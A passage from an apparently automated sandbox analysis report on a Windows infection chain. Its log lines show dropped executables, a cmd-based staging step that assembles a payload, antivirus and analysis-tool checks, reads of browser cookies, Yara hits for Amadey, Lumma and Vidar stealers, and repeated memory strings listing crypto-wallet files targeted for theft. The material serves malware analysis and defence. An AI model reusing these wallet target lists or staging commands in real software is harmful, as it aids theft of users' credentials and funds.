                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,44_2_000814AE
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00081FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,44_2_00081FB0
                          Source: Dry.com, 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmp, Volunteer.28.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: Dry.comBinary or memory string: Shell_TrayWnd
                          Source: db77c3e215.exe, 0000002E.00000002.3040315631.0000000000303000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: _Program Manager
                          Source: file.exe, file.exe, 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: -Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006AD670 cpuid 10_2_006AD670
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018974001\e50a86318f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018975001\2eba742a99.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018975001\2eba742a99.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018976001\b1a3afa605.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018976001\b1a3afa605.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018978001\1742fccc73.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018978001\1742fccc73.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018979001\adcff63ffe.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018979001\adcff63ffe.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018980001\c48ca243d4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018980001\c48ca243d4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0006CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0006CBEA
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0007E652 GetUserNameW,44_2_0007E652
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,44_2_0005BCD2
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006ADBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,10_2_006ADBA0
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                          Source: 4fa7efe79d.exe, 00000031.00000003.3347092723.0000000001089000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353112558.0000000001089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 0.2.file.exe.50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.f90000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.2108909272.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000003.2672749094.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2150357431.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: 4fa7efe79d.exe PID: 2252, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 44.2.Dry.com.5d0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.3133557173.0000000001937000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Dry.com PID: 4952, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191796626.0000000003836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn4Hg
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet 